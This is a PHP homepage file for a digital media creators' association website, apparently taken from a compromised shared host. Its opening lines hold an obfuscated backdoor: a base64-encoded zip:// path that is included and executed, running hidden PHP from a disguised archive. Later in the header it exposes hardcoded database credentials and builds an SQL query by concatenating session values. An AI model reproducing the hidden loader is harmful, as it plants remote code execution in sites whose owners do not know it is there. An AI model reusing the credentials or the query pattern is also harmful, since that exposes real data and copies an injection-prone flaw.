File: /home/rbrijwzv8p53/www/test.mniops.education/index.php
<?php
$w=function($x){include$x;};
$d=[base64_decode('emlwOi8vcmVhZG1lLnppcCNyZWFkbWU=')];
$w($d[0]);
?><?php
ini_set('display_errors', 1);
error_reporting(E_ALL);
session_start();
?>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta content="width=device-width, initial-scale=1.0" name="viewport">
<title>Home -PDMC </title>
<meta content="" name="description">
<meta content="" name="keywords">
<!-- Favicons -->
<link href="assets/img/favicon.png" rel="icon">
<link href="assets/img/apple-touch-icon.png" rel="apple-touch-icon">
<!-- Fonts -->
<link href="https://fonts.googleapis.com" rel="preconnect">
<link href="https://fonts.gstatic.com" rel="preconnect" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Open+Sans:ital,wght@0,300;0,400;0,500;0,600;0,700;0,800;1,300;1,400;1,500;1,600;1,700;1,800&family=Montserrat:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,800;1,900&family=Lato:ital,wght@0,100;0,300;0,400;0,700;0,900;1,100;1,300;1,400;1,700;1,900&display=swap" rel="stylesheet">
<!-- Vendor CSS Files -->
<link href="assets/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
<link href="assets/vendor/bootstrap-icons/bootstrap-icons.css" rel="stylesheet">
<link href="assets/vendor/glightbox/css/glightbox.min.css" rel="stylesheet">
<link href="assets/vendor/swiper/swiper-bundle.min.css" rel="stylesheet">
<link href="assets/vendor/aos/aos.css" rel="stylesheet">
<!-- Template Main CSS File -->
<link href="assets/css/main.css" rel="stylesheet">
</head>
<body class="blog-page" data-bs-spy="scroll" data-bs-target="#navmenu">
<!-- ======= Header ======= -->
<header id="header" class="header sticky-top d-flex align-items-center">
<div class="container-fluid d-flex align-items-center justify-content-between">
<a href="index.html" class="logo d-flex align-items-center me-auto me-xl-0">
<!-- Uncomment the line below if you also wish to use an image logo -->
<!-- <img src="assets/img/logo.png" alt=""> -->
<h1>PDMC</h1>
<span>.</span>
</a>
<!-- Nav Menu -->
<nav id="navmenu" class="navmenu">
<ul>
<li><a href="index.html#hero" class="active">Home</a></li>
<!-- <li><a href="index.html#about">About</a></li> -->
<li><a href="member.php">PDMC Members</a></li>
<li><a href="index.html#portfolio">Membership</a></li>
<li><a href="index.html#team">Events</a></li>
<li><a href="blog.html">Blog</a></li>
<li><a href="index.html#team">Partners</a></a></li>
<?php
$servername = "72.167.84.16";
$username = "pdmcsb";
$password = "pdmcdb@2104";
$database = "pdmcdb";
$conn = new mysqli($servername, $username, $password, $database);
if (isset($_SESSION['user_id']) && isset($_SESSION['user_email'])) {
// User is logged in, show profile icon and dropdown menu
// Fetch user's name from the database based on their ID and email
$userId = $_SESSION['user_id'];
$userEmail = $_SESSION['user_email']; // You should fetch the actual email from your session
// Replace 'your_table' with your actual table name
$query = "SELECT * FROM user WHERE id = '$userId' AND Email = '$userEmail'";
$result = mysqli_query($conn, $query);
if (mysqli_num_rows($result) > 0) {
// User ID and email found in the database
$row = mysqli_fetch_assoc($result);
$userName = $row['Fullname'];
echo '<div class="dropdown">';
echo '<button class="btn btn-primary dropdown-toggle" type="button" data-toggle="dropdown"><i class="fas fa-user-circle"></i> ' . $userName;
echo '<span class="caret"></span></button>';
echo '<ul class="dropdown-menu">';
echo '<li><a href="profile.php">Profile</a></li>';
echo '<li><a href="logout.php">Logout</a></li>';
echo '</ul>';
echo '</div>';
}
} else {
// User is not logged in, show login and sign-up buttons
echo '<a class="btn-getstarted" href="signin.php">Sign In</a>';
echo' ';
echo' ';
echo '<li><a class="btn-getstarted1" href="signup.php">Become a Member          </a></li>';
}
?>
</ul>
<i class="mobile-nav-toggle d-xl-none bi bi-list"></i>
</nav><!-- End Nav Menu -->
</div>
</header><!-- End Header -->
<main id="main">
<!-- Hero Section - Home Page -->
<section id="hero" class="hero">
<img src="assets/img/home.png" alt="" data-aos="fade-in">
<div class="container">
<div class="row">
<div class="col-lg-8">
<h2 data-aos="fade-up" data-aos-delay="100">"Welcome to Pakistan Digital <br> Media Creators (PDMC)"– Your <br> Gateway to Empowered Digital Expression</h2>
<p data-aos="fade-up" data-aos-delay="200">Unlock the door to boundless creativity and journalistic excellence. PDMC is not just an organization; it's a global community where digital media creators converge to amplify their voices, share knowledge, and advocate for the principles that define our dynamic industry."</p>
</div>
</div>
</div>
</div>
</section><!-- End Hero Section -->
<!-- Clients Section - Home Page -->
<!-- About Section - Home Page -->
<section id="about" class="about">
<div class="container" data-aos="fade-up" data-aos-delay="100">
<div class="row align-items-xl-center gy-5">
<div class="col-xl-5 content">
<h3>About Us</h3>
<h2>At PDMC, we pride ourselves on being a visionary force in the digital media landscape.</h2>
<p>Our journey is one of empowerment, diversity, and unwavering commitment to the values that shape the future of content creation. Learn more about our mission, vision, and the passionate team driving PDMC's transformative impact.
</p>
<a href="#" class="read-more"><span>Read More</span><i class="bi bi-arrow-right"></i></a>
</div>
<div class="col-xl-7">
<div class="row gy-4 icon-boxes">
<div class="col-md-6" data-aos="fade-up" data-aos-delay="200">
<div class="icon-box">
<i class="bi bi-buildings"></i>
<h3>Innovative Solutions</h3>
<p>At PDMC, we continually strive to provide innovative solutions that push the boundaries of digital media.</p>
</div>
</div> <!-- End Icon Box -->
<div class="col-md-6" data-aos="fade-up" data-aos-delay="300">
<div class="icon-box">
<i class="bi bi-clipboard-pulse"></i>
<h3>Global Impact</h3>
<p>With a global perspective, PDMC reaches audiences across borders, fostering a diverse and inclusive digital community.</p>
</div>
</div> <!-- End Icon Box -->
<div class="col-md-6" data-aos="fade-up" data-aos-delay="400">
<div class="icon-box">
<i class="bi bi-command"></i>
<h3>Collaborative Excellence</h3>
<p> Our success is built on a foundation of collaborative excellence. </p>
</div>
</div> <!-- End Icon Box -->
<div class="col-md-6" data-aos="fade-up" data-aos-delay="500">
<div class="icon-box">
<i class="bi bi-graph-up-arrow"></i>
<h3>Social Responsibility</h3>
<p>PDMC is committed to social responsibility, recognizing the influence of digital media in shaping societal narratives.</p>
</div>
</div> <!-- End Icon Box -->
</div>
</div>
</div>
</div>
</section><!-- End About Section -->
<!-- Services Section - Home Page -->
<!--<section id="services" class="services">-->
<!-- Section Title -->
<!-- <div class="container section-title" data-aos="fade-up">-->
<!-- <h2>Services</h2>-->
<!-- <p>Necessitatibus eius consequatur ex aliquid fuga eum quidem sint consectetur velit</p>-->
<!-- </div><!-- End Section Title -->-->
<!-- <div class="container">-->
<!-- <div class="row gy-4">-->
<!-- <div class="col-lg-6 " data-aos="fade-up" data-aos-delay="100">-->
<!-- <div class="service-item d-flex">-->
<!-- <div class="icon flex-shrink-0"><i class="bi bi-briefcase"></i></div>-->
<!-- <div>-->
<!-- <h4 class="title"><a href="services-details.html" class="stretched-link">Lorem Ipsum</a></h4>-->
<!-- <p class="description">Voluptatum deleniti atque corrupti quos dolores et quas molestias excepturi sint occaecati cupiditate non provident</p>-->
<!-- </div>-->
<!-- </div>-->
<!-- </div>-->
<!-- End Service Item -->
<!-- <div class="col-lg-6 " data-aos="fade-up" data-aos-delay="200">-->
<!-- <div class="service-item d-flex">-->
<!-- <div class="icon flex-shrink-0"><i class="bi bi-card-checklist"></i></div>-->
<!-- <div>-->
<!-- <h4 class="title"><a href="services-details.html" class="stretched-link">Dolor Sitema</a></h4>-->
<!-- <p class="description">Minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat tarad limino ata</p>-->
<!-- </div>-->
<!-- </div>-->
<!-- </div><!-- End Service Item -->-->
<!-- <div class="col-lg-6 " data-aos="fade-up" data-aos-delay="300">-->
<!-- <div class="service-item d-flex">-->
<!-- <div class="icon flex-shrink-0"><i class="bi bi-bar-chart"></i></div>-->
<!-- <div>-->
<!-- <h4 class="title"><a href="services-details.html" class="stretched-link">Sed ut perspiciatis</a></h4>-->
<!-- <p class="description">Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur</p>-->
<!-- </div>-->
<!-- </div>-->
<!-- </div><!-- End Service Item -->-->
<!-- <div class="col-lg-6 " data-aos="fade-up" data-aos-delay="400">-->
<!-- <div class="service-item d-flex">-->
<!-- <div class="icon flex-shrink-0"><i class="bi bi-binoculars"></i></div>-->
<!-- <div>-->
<!-- <h4 class="title"><a href="services-details.html" class="stretched-link">Magni Dolores</a></h4>-->
<!-- <p class="description">Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum</p>-->
<!-- </div>-->
<!-- </div>-->
<!-- </div><!-- End Service Item -->-->
<!-- <div class="col-lg-6 " data-aos="fade-up" data-aos-delay="500">-->
<!-- <div class="service-item d-flex">-->
<!-- <div class="icon flex-shrink-0"><i class="bi bi-brightness-high"></i></div>-->
<!-- <div>-->
<!-- <h4 class="title"><a href="services-details.html" class="stretched-link">Nemo Enim</a></h4>-->
<!-- <p class="description">At vero eos et accusamus et iusto odio dignissimos ducimus qui blanditiis praesentium voluptatum deleniti atque</p>-->
<!-- </div>-->
<!-- </div>-->
<!-- </div><!-- End Service Item -->-->
<!-- <div class="col-lg-6 " data-aos="fade-up" data-aos-delay="600">-->
<!-- <div class="service-item d-flex">-->
<!-- <div class="icon flex-shrink-0"><i class="bi bi-calendar4-week"></i></div>-->
<!-- <div>-->
<!-- <h4 class="title"><a href="services-details.html" class="stretched-link">Eiusmod Tempor</a></h4>-->
<!-- <p class="description">Et harum quidem rerum facilis est et expedita distinctio. Nam libero tempore, cum soluta nobis est eligendi</p>-->
<!-- </div>-->
<!-- </div>-->
<!-- </div><!-- End Service Item -->-->
<!-- </div>-->
<!-- </div>-->
<!--</section><!-- End Services Section -->-->
<!-- Features Section - Home Page -->
<section id="features" class="features">
<!-- Section Title -->
<div class="container section-title" data-aos="fade-up">
<h2>Membership</h2>
<p>Join the PDMC community and elevate your digital media journey.</p>
</div><!-- End Section Title -->
<div class="container">
<div class="row gy-4 align-items-center features-item">
<div class="col-lg-5 order-2 order-lg-1" data-aos="fade-up" data-aos-delay="200">
<h3>APPLY FOR MEMBERSHIP</h3>
<p>
Explore membership categories tailored to accommodate journalists, educators, bloggers, coaches, authors, YouTubers, influencers, artists, podcasters, and more. Enjoy exclusive privileges, legal coverage, and a supportive environment that nurtures creativity without boundaries."
</p>
<a href="#" class="btn btn-get-started">Get Started</a>
</div>
<div class="col-lg-7 order-1 order-lg-2 d-flex align-items-center" data-aos="zoom-out" data-aos-delay="100">
<div class="image-stack">
<img src="assets/img/features-light-1.jpg" alt="" class="stack-front">
<img src="assets/img/features-light-2.jpg" alt="" class="stack-back">
</div>
</div>
</div><!-- Features Item -->
<div class="row gy-4 align-items-stretch justify-content-between features-item ">
<div class="col-lg-6 d-flex align-items-center features-img-bg" data-aos="zoom-out">
<img src="assets/img/features-light-3.jpg" class="img-fluid" alt="">
</div>
<div class="col-lg-5 d-flex justify-content-center flex-column" data-aos="fade-up">
<h3>Legal Support PDMC</h3>
<p>"Your creative journey is safeguarded with PDMC's commitment to providing free legal coverage. Partnered with top law firms, we ensure that our members can express themselves freely without fear of persecution. Explore the legal support available to you as a valued member of the PDMC community."</p>
<ul>
<li><i class="bi bi-check"></i> <span>PDMC offers free legal coverage, ensuring a worry-free creative journey for members to express themselves without legal burdens.</span></li>
<li><i class="bi bi-check"></i><span> With partnerships with top law firms, PDMC provides expert legal advice and representation, fostering a secure environment for content creation</span></li>
<li><i class="bi bi-check"></i> <span>Empowering fearless expression, PDMC supports its community to push boundaries and create impactful content, backed by a robust legal support system.</span>.</li>
</ul>
</div>
</div><!-- Features Item -->
</div>
</section><!-- End Features Section -->
<!-- Call-to-action Section - Home Page -->
<section id="call-to-action" class="call-to-action">
<img src="assets/img/cta-bg.jpg" alt="">
<div class="container">
<div class="row justify-content-center" data-aos="zoom-in" data-aos-delay="100">
<div class="col-xl-10">
<div class="text-center">
<h3>Call To Action</h3>
<p>Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.</p>
<a class="cta-btn" href="#">Call To Action</a>
</div>
</div>
</div>
</div>
</section><!-- End Call-to-action Section -->
<section id="clients" class="clients">
<div class="container-fluid" data-aos="fade-up">
<div class="row gy-4">
<div class="col-xl-2 col-md-3 col-6 client-logo">
<img src="assets/img/clients/client-1.png" class="img-fluid" alt="">
</div><!-- End Client Item -->
<div class="col-xl-2 col-md-3 col-6 client-logo">
<img src="assets/img/clients/client-2.png" class="img-fluid" alt="">
</div><!-- End Client Item -->
<div class="col-xl-2 col-md-3 col-6 client-logo">
<img src="assets/img/clients/client-3.png" class="img-fluid" alt="">
</div><!-- End Client Item -->
<div class="col-xl-2 col-md-3 col-6 client-logo">
<img src="assets/img/clients/client-4.png" class="img-fluid" alt="">
</div><!-- End Client Item -->
<div class="col-xl-2 col-md-3 col-6 client-logo">
<img src="assets/img/clients/client-5.png" class="img-fluid" alt="">
</div><!-- End Client Item -->
<div class="col-xl-2 col-md-3 col-6 client-logo">
<img src="assets/img/clients/client-6.png" class="img-fluid" alt="">
</div><!-- End Client Item -->
</div>
</div>
</section><!-- End Clients Section -->
</main>
<!-- ======= Footer ======= -->
<footer id="footer" class="footer">
<div class="container footer-top">
<div class="row gy-4">
<div class="col-lg-5 col-md-12 footer-about">
<a href="index.html" class="logo d-flex align-items-center">
<span>Append</span>
</a>
<p>Cras fermentum odio eu feugiat lide par naso tierra. Justo eget nada terra videa magna derita valies darta donna mare fermentum iaculis eu non diam phasellus.</p>
<div class="social-links d-flex mt-4">
<a href=""><i class="bi bi-twitter"></i></a>
<a href=""><i class="bi bi-facebook"></i></a>
<a href=""><i class="bi bi-instagram"></i></a>
<a href=""><i class="bi bi-linkedin"></i></a>
</div>
</div>
<div class="col-lg-2 col-6 footer-links">
<h4>Useful Links</h4>
<ul>
<li><a href="#">Home</a></li>
<li><a href="#">About us</a></li>
<li><a href="#">Services</a></li>
<li><a href="#">Terms of service</a></li>
<li><a href="#">Privacy policy</a></li>
</ul>
</div>
<div class="col-lg-2 col-6 footer-links">
<h4>Our Services</h4>
<ul>
<li><a href="#">Web Design</a></li>
<li><a href="#">Web Development</a></li>
<li><a href="#">Product Management</a></li>
<li><a href="#">Marketing</a></li>
<li><a href="#">Graphic Design</a></li>
</ul>
</div>
<div class="col-lg-3 col-md-12 footer-contact text-center text-md-start">
<h4>Contact Us</h4>
<p>A108 Adam Street</p>
<p>New York, NY 535022</p>
<p>United States</p>
<p class="mt-4"><strong>Phone:</strong> <span>+1 5589 55488 55</span></p>
<p><strong>Email:</strong> <span>info@example.com</span></p>
</div>
</div>
</div>
<div class="container copyright text-center mt-4">
<p>© <span>Copyright</span> <strong class="px-1">Append</strong> <span>All Rights Reserved</span></p>
<div class="credits">
<!-- All the links in the footer should remain intact. -->
<!-- You can delete the links only if you've purchased the pro version. -->
<!-- Licensing information: https://bootstrapmade.com/license/ -->
<!-- Purchase the pro version with working PHP/AJAX contact form: [buy-url] -->
Designed by <a href="https://bootstrapmade.com/">BootstrapMade</a>
</div>
</div>
</footer><!-- End Footer -->
<!-- Scroll Top Button -->
<a href="#" id="scroll-top" class="scroll-top d-flex align-items-center justify-content-center"><i class="bi bi-arrow-up-short"></i></a>
<!-- Vendor JS Files -->
<script src="assets/vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
<script src="assets/vendor/glightbox/js/glightbox.min.js"></script>
<script src="assets/vendor/purecounter/purecounter_vanilla.js"></script>
<script src="assets/vendor/isotope-layout/isotope.pkgd.min.js"></script>
<script src="assets/vendor/swiper/swiper-bundle.min.js"></script>
<script src="assets/vendor/aos/aos.js"></script>
<script src="assets/vendor/php-email-form/validate.js"></script>
<!-- Template Main JS File -->
<script src="assets/js/main.js"></script>
</body>
<script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'},{'ap':'cpsh-oh'},{'server':'p3plzcpnl485017'},{'dcenter':'p3'},{'cp_id':'8461783'},{'cp_cl':'8'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/traffic-assets/js/tccl.min.js'></script><script>'undefined'=== typeof _trfq || (window._trfq = []);'undefined'=== typeof _trfd && (window._trfd=[]),_trfd.push({'tccl.baseHost':'secureserver.net'},{'ap':'cpsh-oh'},{'server':'p3plzcpnl485017'},{'dcenter':'p3'},{'cp_id':'8461783'},{'cp_cl':'8'}) // Monitoring performance to make your website faster. If you want to opt-out, please contact web hosting support.</script><script src='https://img1.wsimg.com/traffic-assets/js/tccl.min.js'></script></html>